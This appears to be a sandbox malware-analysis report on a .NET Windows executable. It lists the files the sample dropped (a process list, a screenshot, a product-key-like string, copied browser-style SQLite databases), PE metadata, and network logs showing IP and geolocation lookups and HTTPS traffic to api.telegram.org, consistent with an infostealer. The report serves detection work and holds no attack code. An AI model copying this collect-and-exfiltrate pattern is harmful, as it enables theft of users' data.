                                                                                                                                                            Entropy (8bit):4.004364184708143
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:qIiIWgmvIn8V4t:q0WTa8V4t
                                                                                                                                                            MD5:EE5834CF7B99959504966496B05B7C25
                                                                                                                                                            SHA1:446FB2A13D57B2EAB4D0598608AF7C5FD55EC612
                                                                                                                                                            SHA-256:3CA9911782E07324F4AF0ED95BC314DE0A0DE36A72F0D54FD4B6EEA3F54D0E39
                                                                                                                                                            SHA-512:FE090F13392A1E15E3067EC06FE642139EA3E8183363309CFA5CACDC7270B4ED6F3E5554B660EE6BBBC93F1890F6ECA213C613BB9620A747E843478476A64DF3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:DBP2K-R7NFX-376CJ-BYY3P-C9P8X
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):84
                                                                                                                                                            Entropy (8bit):4.6630509827051725
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                                                                                                            MD5:58CD2334CFC77DB470202487D5034610
                                                                                                                                                            SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                                                                                                            SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                                                                                                            SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14022
                                                                                                                                                            Entropy (8bit):5.674372191674035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:yrkHkDkpkykIk3k2kQkZk8kWkDkaknkzkgkJckJgkwk/kwkCIk+kbkpk9kZkjks+:3Lo
                                                                                                                                                            MD5:AF4DF0C7776E73B61D95CC7477228A86
                                                                                                                                                            SHA1:76D3E85E88A7EA28E0A715CDBB978AA44C587CBA
                                                                                                                                                            SHA-256:AB0269473619AB33D1423E57292F38751F5C03C9A9FFFCC223F9A7ED8EF8E511
                                                                                                                                                            SHA-512:AEECA6A682D0A942DCB8A398753860811AAA58BBB3B06EAEC5E2F06C568CED4911C846794E0575A5410AF75475C5EC18B54D59A71E40F9303BB15B76406BBE1F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 6452..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 6016..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 3424..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 5712..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 6420..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: tXfiegClAfqDEuXWI..TITLE: New Tab - Google Chrome..PID: 598
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):104882
                                                                                                                                                            Entropy (8bit):7.9282435839384355
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Ih5rzswIgl19+yQ+dZTAoHYdu/AT4iQzK00q:SKwIgR+ylXf4gAT4iQx0q
                                                                                                                                                            MD5:36E55D05F61AC368384407AF234DCFB4
                                                                                                                                                            SHA1:3B84C2679EE1DE3F00877E5D2DD4E397CF1CECFE
                                                                                                                                                            SHA-256:C96147F18F04D61AE5404EBD796E510D5AE2668CFD8E75B2F303AE7159164239
                                                                                                                                                            SHA-512:43CAB966AF57DF4F7ACEDEA4EB60A15ECAA36E7275C1BB77FF12E089EDC41F650A318012D69B084B011A86C905E3D394B61C7B3011EF710480EF4DB84D3345BF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4
                                                                                                                                                            Entropy (8bit):2.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:bLn:nn
                                                                                                                                                            MD5:4D95D05A4FC4EADBC3B9DDE67AFDCA39
                                                                                                                                                            SHA1:8A485A0EF914C8F42F9D9D16C568F9BDA888FEBD
                                                                                                                                                            SHA-256:9CD129F891C52EC5E398BB70D3289954935A42D882E9739EB01E925D51980C4A
                                                                                                                                                            SHA-512:C1E5402E420FD66B8AA0EBFDA43BF80842AA156CA539F95DEA1F1E88DBEF183A9FD3B712BAF9C83535268E152142860C794D8C83ED7CB7065F86B0E973FFCF8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:3917
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):94208
                                                                                                                                                            Entropy (8bit):1.2891393435168748
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                            MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                            SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                            SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                            SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):49152
                                                                                                                                                            Entropy (8bit):0.7876734657715041
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):147456
                                                                                                                                                            Entropy (8bit):0.4788315576920595
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:YVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:YVK+H3HDi9GN6IVj3XBBE3u
                                                                                                                                                            MD5:CBB41FCD9B378BBF8B9CC262004C391E
                                                                                                                                                            SHA1:F88112D46F2882AA06A1605B727C505F9188AE8E
                                                                                                                                                            SHA-256:44636710014A0540F2FCE8378C97A99D9B673FA0A95A2C91AAA2DCC4EA7C5570
                                                                                                                                                            SHA-512:B10D30E1DF30D61D59D92C3F48DAF4B907DC3982452132B9E7101CEFEF56590C61D38C331ACDE4EE7CB7D808C3CA86080B5177BEF0D36997E1DCAF019BE05512
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):147456
                                                                                                                                                            Entropy (8bit):0.4788315576920595
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:YVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:YVK+H3HDi9GN6IVj3XBBE3u
                                                                                                                                                            MD5:CBB41FCD9B378BBF8B9CC262004C391E
                                                                                                                                                            SHA1:F88112D46F2882AA06A1605B727C505F9188AE8E
                                                                                                                                                            SHA-256:44636710014A0540F2FCE8378C97A99D9B673FA0A95A2C91AAA2DCC4EA7C5570
                                                                                                                                                            SHA-512:B10D30E1DF30D61D59D92C3F48DAF4B907DC3982452132B9E7101CEFEF56590C61D38C331ACDE4EE7CB7D808C3CA86080B5177BEF0D36997E1DCAF019BE05512
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):94208
                                                                                                                                                            Entropy (8bit):1.2891393435168748
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                            MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                            SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                            SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                            SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                            Malicious:false
                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):5.923954780042463
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            File name:file.exe
                                                                                                                                                            File size:174080
                                                                                                                                                            MD5:c03a7cedc3314e6f0dc26431503dd035
                                                                                                                                                            SHA1:3a4c09c8c54639a839ce19f49e9018e53ac6b2b8
                                                                                                                                                            SHA256:719169d99a13f958de7a3f58d34ac4262cc90924eea256c782ed0b82de6adc0a
                                                                                                                                                            SHA512:28d792343773e1c5c9fd0e526c8a05cb1c18dafb44bc957b79fef4c1079cf71e2fe984dfe3fb9a6855d744e88876410694552ec77cdc5e30c919a71f1f54923e
                                                                                                                                                            SSDEEP:3072:G+STW8djpN6izj8mZw+GSv5hqIPu/i9bcJ2cknew6+WpD:b8XN6W8mm+vvnXPSi9b4M
                                                                                                                                                            TLSH:DA04392437E81919E3FFDBB8F4B001258B72F8236913E76F299459EA1D62344E550BB3
                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                            Entrypoint:0x42bd3e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                            Instruction
                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2bce4          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2c000          0x596         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x29d44       0x29e00   False     0.46538013059701494  data       5.952376276556654    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x2c000          0x596         0x600     False     0.4134114583333333   data       4.029504312109572    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x2e000          0xc           0x200     False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x2c0a0  0x30c  data                                                                                                  0.4269230769230769
RT_MANIFEST  0x2c3ac  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                            Jun 23, 2023 21:21:41.281393051 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.283679008 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.283704996 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.283926010 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.283963919 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284044981 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284061909 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284131050 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284149885 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284311056 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284334898 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284424067 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284454107 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284533978 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284559965 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284671068 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284689903 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284759998 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284780025 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284888029 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284909010 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.285005093 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.285024881 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.285116911 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.285137892 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.285222054 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.285273075 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.285343885 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.285366058 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.288520098 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.288542986 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.604988098 CEST4971480192.168.2.6104.18.114.97
                                                                                                                                                            Jun 23, 2023 21:21:41.622309923 CEST8049714104.18.114.97192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.622461081 CEST4971480192.168.2.6104.18.114.97
                                                                                                                                                            Jun 23, 2023 21:21:42.061414003 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.061712980 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.061791897 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.062531948 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.108527899 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.108588934 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.108680964 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.109625101 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.109652996 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.171897888 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.176506996 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.176553965 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.224705935 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.225384951 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.225425959 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.225552082 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.225578070 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.226052999 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.226102114 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.226212025 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.226243973 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.226567030 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.226614952 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.227319956 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.227359056 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.227695942 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.227734089 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.228063107 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.228105068 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.228400946 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.228432894 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.228754044 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.228791952 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.229181051 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.229239941 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.229581118 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.229617119 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.229909897 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.229943991 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.230346918 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.230384111 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.230679989 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.230710030 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.231071949 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.231123924 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.365184069 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.365300894 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.365379095 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.366830111 CEST49719443192.168.2.6149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 23, 2023 21:21:37.103121996 CEST | 62910 | 53 | 192.168.2.6 | 8.8.8.8
Jun 23, 2023 21:21:37.131951094 CEST | 53 | 62910 | 8.8.8.8 | 192.168.2.6
Jun 23, 2023 21:21:37.253684998 CEST | 63863 | 53 | 192.168.2.6 | 8.8.8.8
Jun 23, 2023 21:21:37.288489103 CEST | 53 | 63863 | 8.8.8.8 | 192.168.2.6
Jun 23, 2023 21:21:37.481709003 CEST | 63229 | 53 | 192.168.2.6 | 8.8.8.8
Jun 23, 2023 21:21:37.509968042 CEST | 53 | 63229 | 8.8.8.8 | 192.168.2.6
Jun 23, 2023 21:21:37.854080915 CEST | 62538 | 53 | 192.168.2.6 | 8.8.8.8
Jun 23, 2023 21:21:37.877794027 CEST | 53 | 62538 | 8.8.8.8 | 192.168.2.6
Jun 23, 2023 21:21:42.092143059 CEST | 54903 | 53 | 192.168.2.6 | 8.8.8.8
Jun 23, 2023 21:21:42.107374907 CEST | 53 | 54903 | 8.8.8.8 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 23, 2023 21:21:37.103121996 CEST | 192.168.2.6 | 8.8.8.8 | 0x27c7 | Standard query (0) | 202.200.1.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jun 23, 2023 21:21:37.253684998 CEST | 192.168.2.6 | 8.8.8.8 | 0x5f30 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Jun 23, 2023 21:21:37.481709003 CEST | 192.168.2.6 | 8.8.8.8 | 0x3edb | Standard query (0) | api.mylnikov.org | A (IP address) | IN (0x0001) | false
Jun 23, 2023 21:21:37.854080915 CEST | 192.168.2.6 | 8.8.8.8 | 0xd212 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jun 23, 2023 21:21:42.092143059 CEST | 192.168.2.6 | 8.8.8.8 | 0x6a79 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
